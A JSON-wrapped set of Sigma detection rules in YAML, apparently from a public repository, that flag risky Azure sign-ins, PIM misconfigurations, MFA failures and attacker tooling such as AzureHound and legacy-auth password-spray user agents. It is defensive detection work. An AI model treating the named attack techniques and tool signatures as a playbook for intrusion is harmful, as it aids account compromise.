    "content": "title: SAML Token Issuer Anomaly\nid: e3393cba-31f0-4207-831e-aef90ab17a8c\nstatus: test\ndescription: Indicates the SAML token issuer for the associated SAML token is potentially compromised. The claims included in the token are unusual or match known attacker patterns\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#token-issuer-anomaly\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1606\n    - attack.credential-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'tokenIssuerAnomaly'\n    condition: selection\nfalsepositives:\n    - We recommend investigating the sessions flagged by this detection in the context of other sign-ins from the user.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/identity_protection/azure_identity_protection_unfamilar_sign_in.yml",
    "content": "title: Unfamiliar Sign-In Properties\nid: 128faeef-79dd-44ca-b43c-a9e236a60f49\nstatus: test\ndescription: Detects sign-in with properties that are unfamiliar to the user. The detection considers past sign-in history to look for anomalous sign-ins.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-protection/concept-identity-protection-risks#unfamiliar-sign-in-properties\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-03\ntags:\n    - attack.t1078\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: riskdetection\ndetection:\n    selection:\n        riskEventType: 'unfamiliarFeatures'\n    condition: selection\nfalsepositives:\n    - User changing to a new device, location, browser, etc.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_account_stale.yml",
    "content": "title: Stale Accounts In A Privileged Role\nid: e402c26a-267a-45bd-9615-bd9ceda6da85\nstatus: test\ndescription: Identifies when an account hasn't signed in during the past n number of days.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#potential-stale-accounts-in-a-privileged-role\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'staleSignInAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate if potential generic account that cannot be removed.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_invalid_license.yml",
    "content": "title: Invalid PIM License\nid: 58af08eb-f9e1-43c8-9805-3ad9b0482bd8\nstatus: test\ndescription: Identifies when an organization doesn't have the proper license for PIM and is out of compliance.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#the-organization-doesnt-have-microsoft-entra-premium-p2-or-microsoft-entra-id-governance\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'invalidLicenseAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate if licenses have expired.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_assigned_outside_of_pim.yml",
    "content": "title: Roles Assigned Outside PIM\nid: b1bc08d1-8224-4758-a0e6-fbcfc98c73bb\nstatus: test\ndescription: Identifies when a privilege role assignment has taken place outside of PIM and may indicate an attack.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-assigned-outside-of-privileged-identity-management\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'rolesAssignedOutsidePrivilegedIdentityManagementAlertConfiguration'\n    condition: selection\nfalsepositives:\n    - Investigate where users are being assigned privileged roles outside of Privileged Identity Management and prohibit future assignments from there.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_frequent_activation.yml",
    "content": "title: Roles Activated Too Frequently\nid: 645fd80d-6c07-435b-9e06-7bc1b5656cba\nstatus: test\ndescription: Identifies when the same privilege role has multiple activations by the same user.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-are-being-activated-too-frequently\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'sequentialActivationRenewalsAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate where if active time period for a role is set too short.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_no_mfa_required.yml",
    "content": "title: Roles Activation Doesn't Require MFA\nid: 94a66f46-5b64-46ce-80b2-75dcbe627cc0\nstatus: test\ndescription: Identifies when a privilege role can be activated without performing mfa.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#roles-dont-require-multi-factor-authentication-for-activation\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'noMfaOnRoleActivationAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate if user is performing MFA at sign-in.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_role_not_used.yml",
    "content": "title: Roles Are Not Being Used\nid: 8c6ec464-4ae4-43ac-936a-291da66ed13d\nstatus: test\ndescription: Identifies when a user has been assigned a privilege role and are not using that role.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#administrators-arent-using-their-privileged-roles\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'redundantAssignmentAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate if potential generic account that cannot be removed.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/privileged_identity_management/azure_pim_too_many_global_admins.yml",
    "content": "title: Too Many Global Admins\nid: 7bbc309f-e2b1-4eb1-8369-131a367d67d3\nstatus: test\ndescription: Identifies an event where there are there are too many accounts assigned the Global Administrator role.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/id-governance/privileged-identity-management/pim-how-to-configure-security-alerts#there-are-too-many-global-administrators\nauthor: Mark Morowczynski '@markmorow', Gloria Lee, '@gleeiamglo'\ndate: 2023-09-14\ntags:\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\n    - attack.persistence\n    - attack.privilege-escalation\nlogsource:\n    product: azure\n    service: pim\ndetection:\n    selection:\n        riskEventType: 'tooManyGlobalAdminsAssignedToTenantAlertIncident'\n    condition: selection\nfalsepositives:\n    - Investigate if threshold setting in PIM is too low.\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_account_lockout.yml",
    "content": "title: Account Lockout\nid: 2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a\nstatus: test\ndescription: Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-25\ntags:\n    - attack.credential-access\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 50053\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_auth_failure_increase.yml",
    "content": "title: Increased Failed Authentications Of Any Type\nid: e1d02b53-c03c-4948-b11d-4d00cca49d03\nstatus: test\ndescription: Detects when sign-ins increased by 10% or greater.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'\ndate: 2022-08-11\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: failure\n        Count: \"<10%\"\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_auth_sucess_increase.yml",
    "content": "title: Measurable Increase Of Successful Authentications\nid: 67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae\nstatus: test\ndescription: Detects when successful sign-ins increased by 10% or greater.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins\nauthor: Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton\ndate: 2022-08-11\nmodified: 2022-08-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: Success\n        Count: \"<10%\"\n    condition: selection\nfalsepositives:\n    - Increase of users in the environment\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_auth_to_important_apps_using_single_factor_auth.yml",
    "content": "title: Authentications To Important Apps Using Single Factor Authentication\nid: f272fb46-25f2-422c-b667-45837994980f\nstatus: test\ndescription: Detect when authentications to important application(s) only required single-factor authentication\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n        AppId: 'Insert Application ID use OR for multiple'\n        AuthenticationRequirement: 'singleFactorAuthentication'\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml",
    "content": "title: Successful Authentications From Countries You Do Not Operate Out Of\nid: 8c944ecb-6970-4541-8496-be554b8e2846\nstatus: test\ndescription: Detect successful authentications from countries you do not operate out of.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n    filter:\n        Location|contains: '<Countries you DO operate out of e,g GB, use OR for multiple>'\n    condition: selection and not filter\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_azurehound_discovery.yml",
    "content": "title: Discovery Using AzureHound\nid: 35b781cc-1a08-4a5a-80af-42fd7c315c6b\nstatus: test\ndescription: Detects AzureHound (A BloodHound data collector for Microsoft Azure) activity via the default User-Agent that is used during its operation after successful authentication.\nreferences:\n    - https://github.com/BloodHoundAD/AzureHound\nauthor: Janantha Marasinghe\ndate: 2022-11-27\ntags:\n    - attack.discovery\n    - attack.t1087.004\n    - attack.t1526\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        userAgent|contains: 'azurehound'\n        ResultType: 0\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_device_registration_or_join_without_mfa.yml",
    "content": "title: Device Registration or Join Without MFA\nid: 5afa454e-030c-4ab4-9253-a90aa7fcc581\nstatus: test\ndescription: Monitor and alert for device registration or join events where MFA was not performed.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#device-registrations-and-joins-outside-policy\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResourceDisplayName: 'Device Registration Service'\n        conditionalAccessStatus: 'success'\n    filter_mfa:\n        AuthenticationRequirement: 'multiFactorAuthentication'\n    condition: selection and not filter_mfa\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_failed_auth_from_countries_you_do_not_operate_out_of.yml",
    "content": "title: Failed Authentications From Countries You Do Not Operate Out Of\nid: 28870ae4-6a13-4616-bd1a-235a7fad7458\nstatus: test\ndescription: Detect failed authentications from countries you do not operate out of.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n    selection1:\n        Location|contains: '<Countries you DO operate out of e,g GB, use OR for multiple>'\n    condition: not selection and not selection1\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_only_single_factor_auth_required.yml",
    "content": "title: Azure AD Only Single Factor Authentication Required\nid: 28eea407-28d7-4e42-b0be-575d5ba60b2c\nstatus: test\ndescription: Detect when users are authenticating without MFA being required.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-07-27\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1556.006\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n        AuthenticationRequirement: 'singleFactorAuthentication'\n    condition: selection\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_risky_sign_ins_with_singlefactorauth_from_unknown_devices.yml",
    "content": "title: Suspicious SignIns From A Non Registered Device\nid: 572b12d4-9062-11ed-a1eb-0242ac120002\nstatus: test\ndescription: Detects risky authentication from a non AD registered device without MFA being required.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in\nauthor: Harjot Singh, '@cyb3rjy0t'\ndate: 2023-01-10\nmodified: 2025-07-02\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection_main:\n        Status: 'Success'\n        AuthenticationRequirement: 'singleFactorAuthentication'\n        RiskState: 'atRisk'\n    selection_empty1:\n        DeviceDetail.trusttype: ''\n    selection_empty2:\n        DeviceDetail.trusttype: null\n    condition: selection_main and 1 of selection_empty*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_noncompliant_devices.yml",
    "content": "title: Sign-ins from Non-Compliant Devices\nid: 4f77e1d7-3982-4ee0-8489-abf2d6b75284\nstatus: test\ndescription: Monitor and alert for sign-ins where the device was non-compliant.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        DeviceDetail.isCompliant: 'false'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_sign_ins_from_unknown_devices.yml",
    "content": "title: Sign-ins by Unknown Devices\nid: 4d136857-6a1a-432a-82fc-5dd497ee5e7c\nstatus: test\ndescription: Monitor and alert for Sign-ins by unknown devices from non-Trusted locations.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-devices#non-compliant-device-sign-in\nauthor: Michael Epping, '@mepples21'\ndate: 2022-06-28\nmodified: 2022-10-05\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.initial-access\n    - attack.defense-evasion\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        AuthenticationRequirement: singleFactorAuthentication\n        ResultType: 0\n        NetworkLocationDetails: '[]'\n        DeviceDetail.deviceId: ''\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: low\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_ad_suspicious_signin_bypassing_mfa.yml",
    "content": "title: Potential MFA Bypass Using Legacy Client Authentication\nid: 53bb4f7f-48a8-4475-ac30-5a82ddfdf6fc\nstatus: test\ndescription: Detects successful authentication from potential clients using legacy authentication via user agent strings. This could be a sign of MFA bypass using a password spray attack.\nreferences:\n    - https://web.archive.org/web/20230217071802/https://blooteem.com/march-2022\n    - https://www.microsoft.com/en-us/security/blog/2021/10/26/protect-your-business-from-password-sprays-with-microsoft-dart-recommendations/\nauthor: Harjot Singh, '@cyb3rjy0t'\ndate: 2023-03-20\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n        userAgent|contains:\n            - 'BAV2ROPC'\n            - 'CBAinPROD'\n            - 'CBAinTAR'\n    condition: selection\nfalsepositives:\n    - Known Legacy Accounts\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_app_device_code_authentication.yml",
    "content": "title: Application Using Device Code Authentication Flow\nid: 248649b7-d64f-46f0-9fb2-a52774166fb5\nstatus: test\ndescription: |\n    Device code flow is an OAuth 2.0 protocol flow specifically for input constrained devices and is not used in all environments.\n    If this type of flow is seen in the environment and not being used in an input constrained device scenario, further investigation is warranted.\n    This can be a misconfigured application or potentially something malicious.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-01\ntags:\n    - attack.t1078\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        properties.message: Device Code\n    condition: selection\nfalsepositives:\n    - Applications that are input constrained will need to use device code flow and are valid authentications.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_app_ropc_authentication.yml",
    "content": "title: Applications That Are Using ROPC Authentication Flow\nid: 55695bc0-c8cf-461f-a379-2535f563c854\nstatus: test\ndescription: |\n    Resource owner password credentials (ROPC) should be avoided if at all possible as this requires the user to expose their current password credentials to the application directly.\n    The application then uses those credentials to authenticate the user against the identity provider.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-applications#application-authentication-flows\nauthor: Mark Morowczynski '@markmorow', Bailey Bercik '@baileybercik'\ndate: 2022-06-01\ntags:\n    - attack.t1078\n    - attack.defense-evasion\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.initial-access\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        properties.message: ROPC\n    condition: selection\nfalsepositives:\n    - Applications that are being used as part of automated testing or a legacy application that cannot use any other modern authentication flow\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_blocked_account_attempt.yml",
    "content": "title: Account Disabled or Blocked for Sign in Attempts\nid: 4afac85c-224a-4dd7-b1af-8da40e1c60bd\nstatus: test\ndescription: Detects when an account is disabled or blocked for sign in but tried to log in\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts\nauthor: Yochana Henderson, '@Yochana-H'\ndate: 2022-06-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 50057\n        ResultDescription: Failure\n    condition: selection\nfalsepositives:\n    - Account disabled or blocked in error\n    - Automation account has been blocked or disabled\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_conditional_access_failure.yml",
    "content": "title: Sign-in Failure Due to Conditional Access Requirements Not Met\nid: b4a6d707-9430-4f5f-af68-0337f52d5c42\nstatus: test\ndescription: Define a baseline threshold for failed sign-ins due to Conditional Access failures\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts\nauthor: Yochana Henderson, '@Yochana-H'\ndate: 2022-06-01\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1110\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 53003\n        Resultdescription: Blocked by Conditional Access\n    condition: selection\nfalsepositives:\n    - Service Account misconfigured\n    - Misconfigured Systems\n    - Vulnerability Scanners\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_legacy_authentication_protocols.yml",
    "content": "title: Use of Legacy Authentication Protocols\nid: 60f6535a-760f-42a9-be3f-c9a0a025906e\nstatus: test\ndescription: Alert on when legacy authentication has been used on an account\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-privileged-accounts\nauthor: Yochana Henderson, '@Yochana-H'\ndate: 2022-06-17\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ActivityDetails: Sign-ins\n        ClientApp:\n            - Other client\n            - IMAP\n            - POP3\n            - MAPI\n            - SMTP\n            - Exchange ActiveSync\n            - Exchange Web Services\n        Username: 'UPN'\n    condition: selection\nfalsepositives:\n    - User has been put in acception group so they can use legacy authentication\nlevel: high\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_login_to_disabled_account.yml",
    "content": "title: Login to Disabled Account\nid: 908655e0-25cf-4ae1-b775-1c8ce9cf43d8\nstatus: test\ndescription: Detect failed attempts to sign in to disabled accounts.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 50057\n        ResultDescription: 'User account is disabled. The account has been disabled by an administrator.'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_mfa_denies.yml",
    "content": "title: Multifactor Authentication Denied\nid: e40f4962-b02b-4192-9bfe-245f7ece1f99\nstatus: test\ndescription: User has indicated they haven't instigated the MFA prompt and could indicate an attacker has the password for the account.\nreferences:\n    - https://www.microsoft.com/security/blog/2022/03/22/dev-0537-criminal-actor-targeting-organizations-for-data-exfiltration-and-destruction/\nauthor: AlertIQ\ndate: 2022-03-24\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\n    - attack.t1621\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        AuthenticationRequirement: 'multiFactorAuthentication'\n        Status|contains: 'MFA Denied'\n    condition: selection\nfalsepositives:\n    - Users actually login but miss-click into the Deny button when MFA prompt.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_mfa_interrupted.yml",
    "content": "title: Multifactor Authentication Interrupted\nid: 5496ff55-42ec-4369-81cb-00f417029e25\nstatus: test\ndescription: Identifies user login with multifactor authentication failures, which might be an indication an attacker has the password for the account but can't pass the MFA challenge.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.credential-access\n    - attack.t1078.004\n    - attack.t1110\n    - attack.t1621\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection_50074:\n        ResultType: 50074\n        ResultDescription|contains: 'Strong Auth required'\n    selection_500121:\n        ResultType: 500121\n        ResultDescription|contains: 'Authentication failed during strong authentication request'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_unusual_authentication_interruption.yml",
    "content": "title: Azure Unusual Authentication Interruption\nid: 8366030e-7216-476b-9927-271d79f13cf3\nstatus: test\ndescription: Detects when there is a interruption in the authentication process.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: Austin Songer @austinsonger\ndate: 2021-11-26\nmodified: 2022-12-18\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection_50097:\n        ResultType: 50097\n        ResultDescription: 'Device authentication is required'\n    selection_50155:\n        ResultType: 50155\n        ResultDescription: 'DeviceAuthenticationFailed'\n    selection_50158:\n        ResultType: 50158\n        ResultDescription: 'ExternalSecurityChallenge - External security challenge was not satisfied'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_user_login_blocked_by_conditional_access.yml",
    "content": "title: User Access Blocked by Azure Conditional Access\nid: 9a60e676-26ac-44c3-814b-0c2a8b977adf\nstatus: test\ndescription: |\n    Detect access has been blocked by Conditional Access policies.\n    The access policy does not allow token issuance which might be sights≈ of unauthorizeed login to valid accounts.\nreferences:\n    - https://learn.microsoft.com/en-us/entra/architecture/security-operations-privileged-accounts\nauthor: AlertIQ\ndate: 2021-10-10\nmodified: 2022-12-25\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.credential-access\n    - attack.initial-access\n    - attack.t1110\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        ResultType: 53003\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/azure/signin_logs/azure_users_authenticating_to_other_azure_ad_tenants.yml",
    "content": "title: Users Authenticating To Other Azure AD Tenants\nid: 5f521e4b-0105-4b72-845b-2198a54487b9\nstatus: test\ndescription: Detect when users in your Azure AD tenant are authenticating to other Azure AD Tenants.\nreferences:\n    - https://learn.microsoft.com/en-gb/entra/architecture/security-operations-user-accounts#monitoring-external-user-sign-ins\nauthor: MikeDuddington, '@dudders1'\ndate: 2022-06-30\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.t1078.004\nlogsource:\n    product: azure\n    service: signinlogs\ndetection:\n    selection:\n        Status: 'Success'\n        HomeTenantId: 'HomeTenantID'\n    filter:\n        ResourceTenantId|contains: 'HomeTenantID'\n    condition: selection and not filter\nfalsepositives:\n    - If this was approved by System Administrator.\nlevel: medium\n"
  },
  {
    "path": "rules/cloud/gcp/audit/gcp_access_policy_deleted.yml",
